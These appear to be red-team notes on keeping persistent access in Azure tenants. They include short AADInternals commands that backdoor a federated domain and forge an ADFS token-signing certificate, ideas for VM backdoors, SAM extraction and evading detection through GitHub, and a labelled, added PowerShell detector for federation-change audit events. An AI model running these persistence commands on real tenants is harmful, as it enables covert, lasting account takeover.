Azure Persistence

  • If you can modify a resource, that is a good avenue for persistence
    • the same applies if you can create one

Some attacks can be used for persistence too.

We can create new resources.

We can create a new federated domain:

PS> ConvertTo-AADIntBackdoor -DomainName domainame.io
PS> Get-MsolUser | select userPrincipalName, ImmutableID
PS> Open-AADIntOffice365Portal ..

ADFS: create a new token signing certificate

PS> New-AADIntADFSSelfSignedCertificates
PS> Update-AADIntADFSFederationSettings -Domain cyberranges.io
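
Both techniques above change a domain's federation configuration, which the Azure AD audit log records under the activity names "Set domain authentication" and "Set federation settings on domain". The following detection is an added example, not part of the original notes: the function name, the two allowlists and the sample records are hypothetical or constructed, and it assumes records exported in the Microsoft Graph directoryAudit layout.

```powershell
# Audit-log activity names that record a change to a domain's federation trust.
$FederationActivities = 'Set domain authentication', 'Set federation settings on domain'

function Find-FederationChange {            # hypothetical helper name
    param(
        [Parameter(Mandatory)] [object[]] $AuditRecord,   # directoryAudit-shaped records
        [string[]] $ExpectedFederatedDomain = @(),        # assumed allowlist of federated domains
        [string[]] $ApprovedAdmin = @()                   # assumed allowlist of change owners
    )
    foreach ($r in $AuditRecord) {
        if ($r.activityDisplayName -notin $FederationActivities) { continue }
        # Assumption: the first target resource carries the affected domain name.
        $domain  = ($r.targetResources | Select-Object -First 1).displayName
        $actor   = $r.initiatedBy.user.userPrincipalName
        $reasons = @()
        if ($domain -notin $ExpectedFederatedDomain) { $reasons += 'domain not on federated allowlist' }
        if ($actor  -notin $ApprovedAdmin)           { $reasons += 'actor not an approved admin' }
        [pscustomobject]@{
            Time     = $r.activityDateTime
            Activity = $r.activityDisplayName
            Domain   = $domain
            Actor    = $actor
            Severity = if ($reasons.Count -gt 0) { 'High' } else { 'Review' }
            Reasons  = $reasons -join '; '
        }
    }
}

# Constructed sample records (not real tenant data).
$records = @'
[
 {"activityDateTime":"2024-01-10T09:00:00Z","activityDisplayName":"Update user",
  "initiatedBy":{"user":{"userPrincipalName":"helpdesk@contoso.example"}},
  "targetResources":[{"displayName":"alice"}]},
 {"activityDateTime":"2024-01-10T09:05:00Z","activityDisplayName":"Set federation settings on domain",
  "initiatedBy":{"user":{"userPrincipalName":"idp-admin@contoso.example"}},
  "targetResources":[{"displayName":"contoso.example"}]},
 {"activityDateTime":"2024-01-10T23:41:00Z","activityDisplayName":"Set domain authentication",
  "initiatedBy":{"user":{"userPrincipalName":"svc-sync@contoso.example"}},
  "targetResources":[{"displayName":"unknown-idp.example"}]}
]
'@ | ConvertFrom-Json

Find-FederationChange -AuditRecord $records `
    -ExpectedFederatedDomain 'contoso.example' -ApprovedAdmin 'idp-admin@contoso.example' |
    Format-Table -AutoSize
```

Every federation change is returned for review, since a token-signing certificate swap on an already-federated domain looks like routine maintenance; changes touching a domain or actor outside the allowlists are raised to High.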

Storage account access keys

  • SAS URLs
    • can be generated offline with the access keys
  • Access keys are not automatically rotated
    • unless the storage account is a Key Vault managed storage account

Other Ideas

  • Backdoor Azure VM
    • operating system persistence tools
    • create snapshot of the disk and extract SAM, etc.
  • Custom Azure AD roles
  • Deployment automations
    • attack GitHub rather than Azure to avoid detection, maybe?